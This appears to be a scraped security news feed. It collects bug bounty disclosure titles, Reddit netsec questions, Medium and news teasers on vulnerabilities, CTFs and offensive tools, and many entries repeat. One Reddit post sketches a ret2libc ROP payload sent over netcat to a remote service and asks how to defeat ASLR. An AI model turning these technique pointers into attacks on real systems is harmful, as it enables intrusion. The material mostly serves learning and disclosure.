    Yoti disclosed a bug submitted by ww1: https://hackerone.com/reports/1257586 - Bounty: $1000
    Military name,email,phone,address,certdata Disclosure
    U.S. Dept Of Defense disclosed a bug submitted by unknownsh: https://hackerone.com/reports/1490133
    CVE-2020-3452 on https:///
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1455257
    Arbitrary File Deletion (CVE-2020-3187) on
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1455266
    CSRF - Modify User Settings with one click - Account TakeOver
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799895
    Reflected XSS - in Email Input
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799839
    IDOR - Delete Users Saved Projects
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/800608
    CSRF - Delete Account (Urgent)
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/799855
    CVE-2021-42567 - Apereo CAS Reflected XSS on https://
    U.S. Dept Of Defense disclosed a bug submitted by 3th1c_yuk1: https://hackerone.com/reports/1446236
    XSS because of Akamai ARL misconfiguration on
    U.S. Dept Of Defense disclosed a bug submitted by pirneci: https://hackerone.com/reports/1305477
    RCE .api/nr/report/{id}/download
    Mail.ru disclosed a bug submitted by mkhazov: https://hackerone.com/reports/1348154 - Bounty: $1000
    XSS Stored on https://seedr.ru
    Mail.ru disclosed a bug submitted by fallenskill: https://hackerone.com/reports/1350671
    OS command injection on seedr.ru
    Mail.ru disclosed a bug submitted by fallenskill: https://hackerone.com/reports/1360208 - Bounty: $1000
    SSRF + RCE fastCGI POST /api/nr/video
    Mail.ru disclosed a bug submitted by mkhazov: https://hackerone.com/reports/1354335 - Bounty: $1000
  • Open

    some ODs with various fonts
    http://www.hixie.ch/resources/ https://mirrors.cloud.tencent.com/adobe-fonts/ http://www.paulvlachou.com/fonts/ http://somospixel.com/fonts/ submitted by /u/subwaytech [link] [comments]
    Is the mega discord gone? If so does anyone have a link? Also im sorry if this is the wrong subbreddit for this but i thought this is where I found it initially. Thanks
    submitted by /u/taramj13 [link] [comments]
    How to deploy API to Netlify
    The API I have works fine locally, but It keeps failing when i try to deploy to netlify. I keep getting this error: node:internal/url:552 5:51:22 PM: throw new ERR_INVALID_URL(input); 5:51:22 PM: ^ 5:51:22 PM: TypeError [ERR_INVALID_URL]: Invalid URL 5:51:22 PM: at new NodeError (node:internal/errors:371:5) 5:51:22 PM: at onParseError (node:internal/url:552:9) 5:51:22 PM: at new URL (node:internal/url:628:5) 5:51:22 PM: at Function.parseURL (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:113:76) 5:51:22 PM: at Commander._RedisClient_initiateOptions (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:294:36) 5:51:22 PM: at new RedisClient (/opt/build/repo/node_modules/@node-redis/client/dist/lib/client/index.js:77:148) 5:51:22 PM: at new Com…
  • Open

    Insecure Direct Object Reference Exposes all users of Microsoft Azure Independent Software Vendors
    Hi Everyone, Continue reading on Medium »
    For the first Bounty, it takes a few challenging months, but only a few days for the second.
    Good day, everyone! I spent nearly three hours looking for this bug, but it took me three months to uncover the bug that brought me my… Continue reading on Medium »
    How to Create Your Own Nuclei Template: Part 1 (Indonesia Version)
    Perkenalkan nama saya Muhammad Daffa, seorang mahasiswa di salah satu kampus di Surabaya. Sekarang saya sedang bekerja part time sebagai… Continue reading on Medium »
    Adobe bug bounty using IDOR, Confidential data leaks
    I hacked adobe using IDOR, and got this Continue reading on Medium »
    WardenSwap x Immunefi: Launching a Bug Bounty Program with a reward of up to $100,000 USD.
    WardenSwap aims to give rewards to white hats who uncover bugs in our smart contracts and/or vulnerabilities in our protocols by working… Continue reading on WARDEN Official »
    subNum
    Crawl all URLs and check for subdomain takeover vulnerability. Continue reading on Medium »
    I got Premium Hacking and Bug Bounty Courses *FREE*
    Yes, Yes, Yessssss! I got many, I think more than 1000+ premium ethical hacking and bug bounty courses FREE. Only you have to spend your… Continue reading on Medium »
    Bypass confirmation to add payment method.
    Summary: Continue reading on Medium »
  • Open

    Scans for Movable Type Vulnerability (CVE-2021-20837)
    Article URL: https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454 Comments URL: https://news.ycombinator.com/item?id=30725737 Points: 1 # Comments: 0
  • Open

    Scans for Movable Type Vulnerability (CVE-2021-20837)
    Article URL: https://isc.sans.edu/forums/diary/Scans+for+Movable+Type+Vulnerability+CVE202120837/28454 Comments URL: https://news.ycombinator.com/item?id=30725737 Points: 1 # Comments: 0
    Computer scientist identifies JavaScript vulnerability in thousands of websites
    Article URL: https://hub.jhu.edu/2022/03/14/computer-scientist-identifies-javascript-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30725274 Points: 13 # Comments: 1
  • Open

    XSS Weakness(JSON XSS) to Valid XSS
    오늘은 XSS Weakness를 트리거 가능한 XSS로 바꾸는 방법에 대해 이야기하려고 합니다. 새로운 기술은 아니고 오래전부터 다들 사용하시던 트릭일텐데, 생각해보니 제가 따로 정리했던 적은 없어서 이참에 글로 남겨둘까 합니다. 그럼 시작하죠 🔥 XSS Weakness 우리는 XSS 테스트 중 Content-Type이 JSON인 Reflection 을 발견하는 경우가 있습니다. 이는 ZAP이나 Burpsuite에서도 Active/Passive Scan 등을 통해 체크해주고 있는 부분이죠. Alert (Rule) ZAP Cross Site Scripting Weakness (Reflected in JSON Response) Burpsuite Cross-site scripting (reflected) / Info 당연히 도구에서 탐지는 정보성 탐지고, 크게 우회되는 패턴이 없다면 버려지는 항목들입니다.
    [Cullinan #29] Update 3 Pages
    컬리넌 로그 #29입니다. DOM Clobbering, ZAP, Command Injection 내 업데이트가 있었습니다. Update DOM Clobbering (Add zap script) Update ZAP (Update build snippet) Update Command Injection (Add bypass technic with OOB)
  • Open

    SecWiki News 2022-03-18 Review
    浅谈数据安全 by ourren 利用服务网格为基于微服务的应用程序实施 DevSecOps by ourren 浏览网页就能泄露手机号的小秘密 by ourren 攻击面管理(ASM)技术详解和实现 by ourren ATT&CK红队评估三套靶场渗透记录 by ourren 使用DNS Tunnel技术的Linux后门B1txor20 by ourren ApolloScanner: 自动化巡航扫描框架 by ourren Java 之 CommonsCollections利用链初探 by ourren 2021西湖论剑IOT RW-WriteUp by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-18 Review
    浅谈数据安全 by ourren 利用服务网格为基于微服务的应用程序实施 DevSecOps by ourren 浏览网页就能泄露手机号的小秘密 by ourren 攻击面管理(ASM)技术详解和实现 by ourren ATT&CK红队评估三套靶场渗透记录 by ourren 使用DNS Tunnel技术的Linux后门B1txor20 by ourren ApolloScanner: 自动化巡航扫描框架 by ourren Java 之 CommonsCollections利用链初探 by ourren 2021西湖论剑IOT RW-WriteUp by ourren 更多最新文章,请访问SecWiki
  • Open

    0d1n - Tool for automating customized attacks against web applications. Fully made in C language with pthreads, it has fast performance.
    submitted by /u/CoolerVoid [link] [comments]
  • Open

    0d1n
    Tool for automating customized attacks against web applications. Entirely made in C language with threads, it has fast performance. https://github.com/CoolerVoid/0d1n submitted by /u/CoolerVoid [link] [comments]
  • Open

    Pentesting: The Relevance, Top 10 Tools, And More
    No content preview
  • Open

    Pentesting: The Relevance, Top 10 Tools, And More
    No content preview
  • Open

    Pentesting: The Relevance, Top 10 Tools, And More
    No content preview
  • Open

    Brooklyn 99 CTF - Process and Report
    Lab Goals. This one is a standard “capture the flag” style box with no other goals, so you’re own your own to figure out the methodologies. Continue reading on Medium »
  • Open

    SolarWinds 发出针对 Web Help Desk 用户攻击的警告
    近日,软件开发公司SolarWinds对用户发出警告:安装未打补丁的Web Help Desk软件可能会导致遭受网络攻击的风险。
    FreeBuf甲方群话题讨论 | 聊聊企业SOC平台建设
    如何理清SOC相关服务及产品间的关系及组织性,彼此该如何配合,以发挥最大效率?
    数字金融反欺诈技术应用分析报告(2021年)
    在新一轮科技革命和产业变革的背景下,金融业数字化浪潮蓬勃兴起,大数据、人工智能、云计算等新技术与金融业务深度融合,数字化转型已成为金融业提高服务质量和竞争力的共同选择。
    FreeBuf周报 | 3.15 首设安全实验室应对信息安全;安卓银行木马Escobar 正伺机而动
    本届3·15晚会首次设立了信息安全实验室,并测试了两款产品,引起了广泛关注。
    安全大讲堂 | 谭晓生:安全即服务,万物互联下的网络安全新机遇
    网络安全商业化“路在何方”?
    华硕警告针对路由器的 Cyclops Blink 恶意软件攻击
    Cyclops Blink能在目标设备上建立与攻击者的持久性链接,使其能够远程访问受感染的网络。
    匿名者黑客组织宣称将继续支持乌克兰对抗俄罗斯
    匿名者黑客团体及其附属宣称,将继续针对俄罗斯政府和私人组织展开网络攻击。
    微软即将在6月份彻底淘汰Internet Explorer浏览器
    微软今天提醒Windows用户,他们将会在今年6月份从部分win10版本里淘汰Internet Explorer浏览器。
  • Open

    Decrypt using OpenSSL
    hi there people, I'm trying to decrypt a salted des3 file using openssl: openssl des3 -d -salt -pbkdf2 -in file.des3 -out file.txt -k password But it shows me the next error: bad decrypt 140292356945280:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt Can you guys figure out what is wrong with the command or am I using smth already deprecated? Thanku all submitted by /u/TaryG19 [link] [comments]
  • Open

    Zones and conduits in accordance with IEC 62443 standards
    There are several high-level reference models proposed by different sources and industry leaders to assist in the initial definition and separation of zones and conduits, such as: The DuPont Reference Architecture Tofino Security high-level model Honeywell Reference Architecture Rockwell Reference Architecture. Siemens Reference Architecture. How is each model being used in the industrial automation and control systems to define and separate zones and conduits in accordance with IEC 62443 standards? submitted by /u/Economy-Function-337 [link] [comments]
    Finding ret2Libc's system() address on a remote machine. I need help utilizing extra information.
    I have a similar problem as this StackExchange question. ​ I have the following scienarion: a vulnerable program running in a server and can be accessed using netcat I have a copy of that program locally and I can exploit it locally using ROP: ./vuln garbage + &system() + &exit() + &"/bin/sh" now I want to exploit it remotely so technically I would be executing this command: echo -e "garbage + &system() + &exit() + &/bin/sh" | nc host port My problem is: I do not know what is &system() on the remote machine. Is there any way to get it without brute force ie: trying all memory address from 0x00000000 -> 0xFFFFFFFF BUT, in my case, there is some extra information given. Every time the program also prints the buf address like this:- Enter a string: Here's a clue! The address of buf is 0xffffdc0c But I don't know how to utilize this piece of information. How do I use this? submitted by /u/reddotname [link] [comments]
    Kaspersky alternatives?
    Well with the warning that BSI put out alerting users that Kaspersky could possibly be compromised (either now or in the future) my company is looking for alternatives for their Antivirus software. We'll probably begin the process of evaluation next week but I wanted to get a head start and hear some of the netsec communities opinions on alternatives to Kaspersky. We are in the process of becoming ISO 27001 compliant so every procedure is under extreme scrutiny and requires extensive documentation. Some current candidates are Sopho, Bitdefender and Trend Micro. What are your thoughts on ease of deployment, cost, security and privacy policies of the aforementioned alternatives? Any other suggestions for alternatives? Any comments or suggestions are greatly appreciated, thanks. submitted by /u/Goldsound [link] [comments]

  • Open

    Random number generator enhancements for Linux 5.17 and 5.18
    submitted by /u/zx2c4 [link] [comments]
    Post auth RCE based in malicious LUA plugin script upload SCADA controllers located in Russia
    submitted by /u/bertinjoseb [link] [comments]
    Detecting Headless Chrome: Spotlight on Puppeteer-Extra-Plugin-Stealth
    submitted by /u/threat_researcher [link] [comments]
    Unraveling Assets from Android Apps at Scale - An OSINT API allows you to scan over half a million Android apps for subdomains, S3 buckets, URL Params and more.
    submitted by /u/alt-glitch [link] [comments]
    Mitigating CVE-2022-0811: Arbitrary code execution affecting CRI-O
    submitted by /u/MiguelHzBz [link] [comments]
  • Open

    Is this networking knowledge enough ?
    Is learning how to manage a network,network simulation with GNS3,and installing physical network has to do with security? I can’t deal with gns3 but i can use packet tracer. But what i am asking is that is it enough to learn about the protocols,routing,ip addressing ,and the tcp/ip stack if i want to work in penetration testing. Or should i use a network simulation and dig deeper? I feel that practicing thorough htb and thm teaches me more now that i learned the fundamentals. And when i am stuck with something like active directory i just go into a room in thm or read about it. submitted by /u/Ramseesthe4th [link] [comments]
    HTTP 'PUT' method is enabled on Printer's Web Server
    Hey everyone, I'm a new infosec analyst and I've been tasked to run a vulnerability scan against our company's printers. Our scanner found that the HTTP 'PUT' method is enabled on several of our printers' webservers. How would I go about remediating this vulnerability if it's a HP Embedded Web Server? Right now, there is zero access control configured to log into the web server. Would enabling that help fix the vulnerability? I don't see anywhere in the server settings to disable the method. Thanks so much! submitted by /u/Zgame200 [link] [comments]
    Advice for an security analyst interview at a bank?
    Background about me: few years of low level SOC. mainly just looking at alerts and logs, vuln scanning. honestly dont really do much About the position: not entry level; the requirements look pretty heavy. seems to be a mix of both technical (alerts, incident response, playbooks, risk assessment, threat analysis, vulnerability, backups, pentesting, and more) and GRC stuff. The technical stuff, I have familiarity with most of the stuff, but little practical experience. GRC/compliance stuff, I have no experience whatsoever and have no clue on what to study. Do I just familiarize myself with a bunch of standards like iso 27001? Anyone have experience interviewing or working at a bank? Looking for general tips or guidance on how to prepare for this interview. Thanks! submitted by /u/mygumsaredying [link] [comments]
    Is a cloud provider considered to be a Data Steward or a Data Custodian?
    Help me settle a debate. Is a cloud provider considered to be a Data Steward or a Data Custodian? My vote is they are the Data Steward. A colleague insists they are the Data Custodian. Either way, they have shared responsibility, but again, I'm looking to make sure to use the correct terminology. submitted by /u/paulexander [link] [comments]
    ELI5 Investigating a Suspicious Website
    Can someone walk me through how I would investigate a URL that’s been flagged as suspicious? a good example: omnatuor[.]com submitted by /u/annonuk2020 [link] [comments]
    OpenSSL resources?
    How do you started on OpenSSL? Currently doing some CTF and I encounter some OpenSSL questions, I don't have any idea how to study this one (done with searching on Youtube) Thank you submitted by /u/pldc_bulok [link] [comments]
    Building a security program at a startup?
    I'm a mid-level software engineer with some security experience interviewing with early stage startups for application security engineering positions. Many of these companies are either building a security team from scratch, or have 1-2 security engineers already. I'll primarily be working with developers on doing source code reviews, tool development and automation. I'm assuming there won't be much real mentorship/guidance, so I'd like to know what are some of the first things a new security engineer at an early stage startup should do to hit the ground running. submitted by /u/cppnewb [link] [comments]
    Bachelor Thesis Topic Ideas
    Hello everyone, I'm doing my bachelor's in computer science and I'll be writing my bachelor's thesis. Actually my professor offered a thesis topic related to implementation of access control with certificates on vpn. It's nice but requires me to be at the university and unfortunately I can't be at the same city in the next semester. So I'm looking for more research oriented topics related to security and preferably defensive side. I'd appreciate if anyone can suggest me some topics, so I can talk to my prof in the next meeting with different ideas. Thank you in advance. submitted by /u/guneysss [link] [comments]
    Good Security dashboard Template
    Hi Security Folks, What are the security metrics you are collecting and reporting every week? Is there a good security dashboard template that I can use for my team/upper c-level manager report? submitted by /u/Calm_Scene [link] [comments]
  • Open

    LOLBINed — F-Secure Support Tool (FSDIAG)
    Continue reading on Medium »
    KABLOSUZ AĞ SIZMA TEKNİKLERİ NELERDİR VE KABLOSUZ AĞ GÜVENLİĞİ NASIL SAĞLANIR?
    Kablosuz iletişim teknolojilerinde en önemli paya sahip olan Wi-Fi, radyo dalgalarının kullanılması yoluyla belirli mesafelerde bulunan… Continue reading on Medium »
  • Open

    Ukraine — Point de situation au 18 mars
    Les dernières 24h Continue reading on Medium »
  • Open

    Analyzing Malware with Hooks, Stomps, and Return-addresses
    submitted by /u/dmchell [link] [comments]
  • Open

    CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable
    CVE-2021-28372, a vulnerability in third-party software commonly built into many IP cameras, highlights issues in IoT supply chain security. The post CVE-2021-28372: How a Vulnerability in Third-Party Technology Is Leaving Many IP Cameras and Surveillance Systems Vulnerable appeared first on Unit42.
  • Open

    Escaping Dirty Pipe (a.k.a. CVE-2022-0847), mostly unscathed
    Article URL: https://blog.replit.com/dirtypipe-kernel-vulnerability Comments URL: https://news.ycombinator.com/item?id=30714414 Points: 1 # Comments: 0
    CVE-2022-23812: node-ipc contains malicious code targeting Russia and Belarus
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-23812 Comments URL: https://news.ycombinator.com/item?id=30707728 Points: 39 # Comments: 2
  • Open

    Indirect Command Execution: Defense Evasion (T1202)
    Introduction Indirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense The post Indirect Command Execution: Defense Evasion (T1202) appeared first on Hacking Articles.
  • Open

    Indirect Command Execution: Defense Evasion (T1202)
    Introduction Indirect Command Execution is a defense evasion technique that is often used by Red Teams in which an adversary tries to bypass certain defense The post Indirect Command Execution: Defense Evasion (T1202) appeared first on Hacking Articles.
  • Open

    IDOR at https://demo.sftool.gov/TwsHome/ScorecardManage/ via scorecard name
    U.S. General Services Administration disclosed a bug submitted by hollaatm3: https://hackerone.com/reports/1472721
    Use of uninitialized value of in req_parsebody method of lua_request.c
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1514863 - Bounty: $2400
    Theft of protected files on Android
    ownCloud disclosed a bug submitted by n00b-cyborg: https://hackerone.com/reports/1454002 - Bounty: $50
    Instance Page DOS within Organization on TikTok Ads
    TikTok disclosed a bug submitted by arsene_lupin: https://hackerone.com/reports/1478930 - Bounty: $200
  • Open

    How I was able to find 50+ Cross-site scripting (XSS) Security Vulnerabilities on Bugcrowd Public…
    No content preview
    How contact forms can be exploited to conduct large-scale phishing activity?
    No content preview
    Securing your Linux Servers Part 3
    No content preview
    Synkcon CTF 2021 not-hot-dog Writeup
    No content preview
    Simple Recon Methodology
    No content preview
    TryHackMe: Basic Pentesting
    No content preview
    TryHackMe: RootMe
    No content preview
    TryHackMe: Blue
    No content preview
    TryHackMe: RES
    No content preview
  • Open

    How I was able to find 50+ Cross-site scripting (XSS) Security Vulnerabilities on Bugcrowd Public…
    No content preview
    How contact forms can be exploited to conduct large-scale phishing activity?
    No content preview
    Securing your Linux Servers Part 3
    No content preview
    Synkcon CTF 2021 not-hot-dog Writeup
    No content preview
    Simple Recon Methodology
    No content preview
    TryHackMe: Basic Pentesting
    No content preview
    TryHackMe: RootMe
    No content preview
    TryHackMe: Blue
    No content preview
    TryHackMe: RES
    No content preview
  • Open

    How I was able to find 50+ Cross-site scripting (XSS) Security Vulnerabilities on Bugcrowd Public…
    No content preview
    How contact forms can be exploited to conduct large-scale phishing activity?
    No content preview
    Securing your Linux Servers Part 3
    No content preview
    Synkcon CTF 2021 not-hot-dog Writeup
    No content preview
    Simple Recon Methodology
    No content preview
    TryHackMe: Basic Pentesting
    No content preview
    TryHackMe: RootMe
    No content preview
    TryHackMe: Blue
    No content preview
    TryHackMe: RES
    No content preview
  • Open

    SecWiki News 2022-03-17 Review
    在野无状态扫描的综合研究 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-17 Review
    在野无状态扫描的综合研究 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Unable to run Plaso Autopsy ingest module on Windows 10. Anyone know a workaround?
    I’m running Autopsy 4.19.3 on Windows 10 and I’m unable to run the plaso module against any data source. The logs show this error: SEVERE: Plaso experienced an error during analysis (data source = Y247388.E01, objId = 1, pipeline id = 3, ingest job id = 2) java.nio.file.InvalidPathException: Illegal char at index 92: C:\Users\forensics\Documents\Cases\Y247388-New\ModuleOutput\plaso\2022-03-16 15-15-11 GMT-07:00 It looks like the plaso module is trying to create a file or folder with a colon in it from the timezone information. Is there any way to get around this? submitted by /u/thenebular [link] [comments]
    An employee downloaded a virus to computer.
    What are the chances it was able to access entire server? Have a team working on it but waiting and wondering. submitted by /u/Otherwise-Special-95 [link] [comments]
  • Open

    Bypassing Stack Canaries and NX/DEP (Ret2Lib-C) - Bird - [Intigriti 1337UP LIVE CTF 2022]
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    American NGO affected by your recklessness (node-ipc vulnerability)
    Article URL: https://github.com/RIAEvangelist/node-ipc/issues/308 Comments URL: https://news.ycombinator.com/item?id=30711545 Points: 25 # Comments: 13
  • Open

    X is a New Horror Cult Classic
    BOOGIE NIGHTS meets THE TEXAS CHAINSAW MASSACRE in Ti West’s latest Continue reading on Cinapse »
  • Open

    Parameter Pollution - Zero Day
    Summary : Continue reading on Medium »
    Cansina — Open Source Hidden Content Discovery Tool on Linux
    Reconnaissance is one of the first steps to conduct within a pen test engagement. During this stage, information is gathered using… Continue reading on Medium »
    My First Blind SQL Injection
    Hello Hackers and security community.. Continue reading on Medium »
    Sensitive Information disclosure through unrestricted Directories
    Hello Hackers and Security community.. Continue reading on Medium »
    Google Dorks and a SQL Dump
    A odd Google Dorking method I used to successfully find a sql dump. Continue reading on Medium »
    The 13 Best Vulnerable Web Applications & Vulnerable Websites for Testing
    This list contains a variety of vulnerable websites, vulnerable web apps, battlegrounds and wargames communities. Continue reading on Medium »
  • Open

    FreeBuf 早报 | 2025年中国网安市场规模将超214亿美元;乌安全机构逮捕支持俄军的黑客
    乌克兰安全局(SSU)声称已拘捕一名为俄罗斯部队提供技术支援的黑客。
    dompdf中未修补的RCE漏洞会影响HTML到PDF转换器
    研究人员在“dompdf”中发现了一个未修补的安全漏洞,如果该漏洞被成功利用,可能会导致某些配置中的远程代码被执行。
    GoDaddy 托管的数百个网站,短时间内被部署了后门
    GoDaddy管理服务器上托管的部分WordPress网站,被部署了大量后门。
    新的“B1txor20”Linux 僵尸网络正利用 Log4J 漏洞进行传播
    这种新的B1txor20恶意软件能够将目标设备纳入僵尸网络并充当下载和安装rootkit 的渠道。
    Facebook删除了伪造的乌克兰总统泽连斯基假视频
    最近Facebook删除了一段社交网络上传播的假视频,在这则假视频中,乌克兰总统泽连斯基要求乌克兰军队放下武器投降。
  • Open

    Diagrams and instructions for toilets.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-21220(八)
    作者:Hcamael@知道创宇404实验室 时间:2022年02月21日 第六个研究的是CVE-2021-21220,其chrome的bug编号为:1196683 可以很容易找到其相关信息: 受影响的Chrome最高版本为:89.0.4389.114 受影响的V8最高版本为:8.9.255.24 并且还附带了exp 搭建环境 一键编译相关环境: $ ./build.sh 8.9.255.24...
    从 0 开始学 V8 漏洞利用之 CVE-2021-21220(八)
    作者:Hcamael@知道创宇404实验室 时间:2022年02月21日 第六个研究的是CVE-2021-21220,其chrome的bug编号为:1196683 可以很容易找到其相关信息: 受影响的Chrome最高版本为:89.0.4389.114 受影响的V8最高版本为:8.9.255.24 并且还附带了exp 搭建环境 一键编译相关环境: $ ./build.sh 8.9.255.24...
  • Open

    从 0 开始学 V8 漏洞利用之 CVE-2021-21220(八)
    作者:Hcamael@知道创宇404实验室 时间:2022年02月21日 第六个研究的是CVE-2021-21220,其chrome的bug编号为:1196683 可以很容易找到其相关信息: 受影响的Chrome最高版本为:89.0.4389.114 受影响的V8最高版本为:8.9.255.24 并且还附带了exp 搭建环境 一键编译相关环境: $ ./build.sh 8.9.255.24...
    从 0 开始学 V8 漏洞利用之 CVE-2021-21220(八)
    作者:Hcamael@知道创宇404实验室 时间:2022年02月21日 第六个研究的是CVE-2021-21220,其chrome的bug编号为:1196683 可以很容易找到其相关信息: 受影响的Chrome最高版本为:89.0.4389.114 受影响的V8最高版本为:8.9.255.24 并且还附带了exp 搭建环境 一键编译相关环境: $ ./build.sh 8.9.255.24...

  • Open

    TOOL: ntlmrelayx2proxychains combining/automating ntlmrelayx, crackmapexec, and proxychains!
    submitted by /u/BugbearB [link] [comments]
    NPM supply chain attack: node-ipc and peacenotwar sabotaged as an act of protest by the maintainer
    submitted by /u/tubularobot [link] [comments]
    Cool Open Source Security Tools & Programs list
    submitted by /u/Khaotic_Kernel [link] [comments]
    Git honours embedded bare repos - justinsteven
    submitted by /u/Gallus [link] [comments]
    Call for participants in Rizin/Cutter's Google Summer of Code 2022
    submitted by /u/XVilka [link] [comments]
    Arya - new tool to generate pseudo malware samples based on YARA rules
    submitted by /u/n0llbyte [link] [comments]
    cr8escape: New Vulnerability in CRI-O allows for container brekout
    submitted by /u/raesene2 [link] [comments]
    Top 10 CI/CD Security Risks
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    HermeticWiper Technical Analysis Report
    submitted by /u/mstfknn [link] [comments]
    ThreatMapper 1.3.0 update - +runtime SBOM, +secret scanning, +attack path
    submitted by /u/foobarbazwibble [link] [comments]
    From XSS to RCE (dompdf 0day)
    submitted by /u/mckirk_ [link] [comments]
    Technical Advisory – Apple macOS XAR – Arbitrary File Write (CVE-2022-22582) - Whilst analysing the patch for CVE-2021-30833, an additional vulnerability was identified which could allow for arbitrary file-write when unpacking a malicious XAR archive using the xar utility.
    submitted by /u/digicat [link] [comments]
    7 RCE and DoS vulnerabilities Found in ClickHouse DBMS
    submitted by /u/SRMish3 [link] [comments]
    CVE-2022-25636 : New Linux Bug in Netfilter Firewall Module Lets Attackers Gain Root Access
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    TOOL: ntlmrelayx2proxychains
    ntlmrelayx2proxychains aims to connect the tool of the SecureAuthCorps' impacket suite, ntlmrelayx.py (hereafter referred to as "ntlmrelayx"), along with @byt3bl33d3r's tool, CrackMapExec (hereafter referred to as "CME"), over proxychains, developped by haad. Currently, when having active relays via ntlmrelayx.py, you need to manually provide user, domain, and ip address in CME over proxychains. The idea behind this tool is to automate this process. So have you ever felt too lazy to explore all shares, loggedin users, sessions, disks, and/or password policy manually after using ntlmrelayx or felt too lazy to dump the lsa, sam, and/or ntds on all systems where you found a local administrator? If so, you'll for sure enjoy ntlmrelayx2proxychains! :) Link: https://github.com/He-No/ntlmrelayx2proxychains submitted by /u/BugbearB [link] [comments]
    Have Your Cake and Eat it Too? An Overview of UNC2891
    submitted by /u/dmchell [link] [comments]
  • Open

    Can you be Hacked by Visiting a Website?
    Visiting websites throughout the decades has always had its risks. With the creation of Flashplayer and JavaScript, site visitors could potentially be impacted by malicious viruses, like the notorious YouAreAnIdiot[.]org pop-ups that caused computers to be overrun by a massive amount of pop-ups until their computer rebooted. Unfortunately, infections can, and likely always, will exist when accessing infected sites.  In this article, we’ll discuss the kinds of hacked sites that are still out there and how to avoid them. Continue reading Can you be Hacked by Visiting a Website? at Sucuri Blog.
  • Open

    Basic Pentesting — Process Report
    Step 1: We being Enumeration. Continue reading on Medium »
  • Open

    X-XSS-Protection headers. Protection or vulnerability?
    What is it? Continue reading on Medium »
    Nmap Cheat Sheet
    Full nmap cheat sheet with example. Continue reading on Medium »
    The 7 Penetration Testing Steps & Phases: a Checklist
    7 Steps and Phases of Penetration Testing Continue reading on Medium »
    Optimism Infinite Money Duplication Bugfix Review
    Summary Continue reading on Immunefi »
    Hats Finance Opens New Bug Bounty Program with Fuji DAO
    About Fuji DAO Continue reading on Medium »
    How I was able to find 50+ Cross site scripting(XSS) Security Vulnerabilities on Bugcrowd Public…
    Hello everyone, I hope by the grace of God everyone who is reading this blog post is doing well and their families during this pandemic… Continue reading on Medium »
    AlbusSec:- Penetration-List 05 Cross-Site-Scripting (XSS) — Part 1
    Hello Members, I hope that you liked the previous article that is File-Inclusion. Therefore, I worked hard to complete Penetration-list… Continue reading on Medium »
    How I “HACKED” my college site
    Hello readers , I am Aditya , a second year student at Madhav institute of Technology and Science , Gwalior . This is a story of how I… Continue reading on Medium »
    KitHack — Hacking tools pack in Kali Linux
    KitHack Framework is a free and open-source tool available on GitHub. It is designed to automate the process of downloading and installing… Continue reading on Medium »
  • Open

    Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect
    The Malleable C2 profile helps make Cobalt Strike an effective emulator for which it is difficult to design traditional firewall defenses. The post Cobalt Strike Analysis and Tutorial: How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect appeared first on Unit42.
  • Open

    Just wondering
    Can a phone be hacked? To where you can see my phone calls, text messages, browser history, and location. If so how can I protect my info? submitted by /u/Valuable-Green-8890 [link] [comments]
    What's the correct term for a SaaS provide who uses another Cloud service for their underlying platform?
    I've been wrestling with finding the correct term for a breed of SaaS provider, and I'm hoping that such a thing exists. I'm talking about the SaaS products that use Azure, AWS or Google on the backend for the platform, but construct their own applications for resale. I want to call them middleware, but I know that is not correct. The reason I'm asking is I get A LOT of proposers who make no comments about their own cybersecurity posture, and keep deferring to whatever security is provided by the underlying platform. Thoughts? submitted by /u/paulexander [link] [comments]
    Safe to explore evxt / hives from a compromised machine?
    hi, one of my friend has been hit from some ransomware, and he just aske me some help to reinstall OS (win10). I wondering that this could be a nice chance to investigate (for fun) windows logs and or system registry with some tools like Registry Explorer. Can I do this on my day-to-day machine? Is there any risk to get infected? Sorry for my probably silly question submitted by /u/g-simon [link] [comments]
    Any good communities or forums for learning assembly language or reverse engineering at all?
    Looking for some communities and forums which can help me to learn more about assembly language and reverse engineering. Anyone have any suggestions or resources? submitted by /u/SufficientDistrict10 [link] [comments]
    functional vs non-functional security requirements
    I have been asked me to create functional and non-functional requirements for the products we will acquire from various different vendors. I work in security architecture department. For non-functional they are going to be pretty much generic and I see significant resources on internet but can someone provide some pointers which will help me make functional requirements document for security architecture ? submitted by /u/anjan42 [link] [comments]
    Pentest Burnout - Looking for advice on next steps
